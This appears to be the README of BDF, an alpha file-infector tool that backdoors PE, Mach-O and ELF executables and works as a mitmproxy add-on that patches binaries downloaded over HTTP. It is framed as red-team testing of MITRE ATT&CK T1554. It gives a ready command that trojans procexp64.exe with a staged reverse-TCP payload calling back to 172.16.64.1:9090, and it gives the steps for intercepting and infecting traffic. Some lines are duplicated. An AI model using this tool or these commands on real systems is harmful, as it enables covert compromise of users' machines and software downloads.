If someone manages to make this work with Windows CAB files and or MSP, message me.
Release branch: https://ufile.io/q9ypkduq
What is BDF
BDF allows Blue/Purple/Red Teamers to test against Mitre's ATT&CK Framework, Technique T1554, Compromise Client Software Binary: https://attack.mitre.org/techniques/T1554/
In short:
In short:
- it's a stand alone file infector for macho, elf, and pe file formats.
- It's also a mitmproxy add on. You can use it to patch executables over HTTP.
Alpha
THIS IS Alpha
This supports:
This supports:
- PE
- x86
- x64
- Mach-o
- x86
- x64
- M1
- ELF
- ET_EXEC
- ET_DYN
- x86
- x64
- ARMv7
Install
For this to work, you'll need python 3.9+
Look at requirements.txt
You might need sudo, maybe not. ./install.zsh
Look at requirements.txt
You might need sudo, maybe not. ./install.zsh
BDFProxy example:
Without MITMPROXY
./backdoor.py -f tests/procexp64.exe PATCH_METHOD=jmp_at_entrypoint -q MODE=text_loader_single_cave PAYLOAD=text_loader_reverse_tcp_staged_threaded HOST=172.16.64.1 PORT=9090 ENCODER=None -o proxexp64_text.exe VERBOSE=False MODIFIER=manual
With mitmproxy
Edit the proxy.cfg to your liking
In terminal one:
$ touch bdf.log
$ tail -f bdf.log
Terminal two:
$ mitmproxy -s ./backdoor.py
Edit the proxy.cfg to your liking
In terminal one:
$ touch bdf.log
$ tail -f bdf.log
Terminal two:
$ mitmproxy -s ./backdoor.py
Set your proxy to port 8080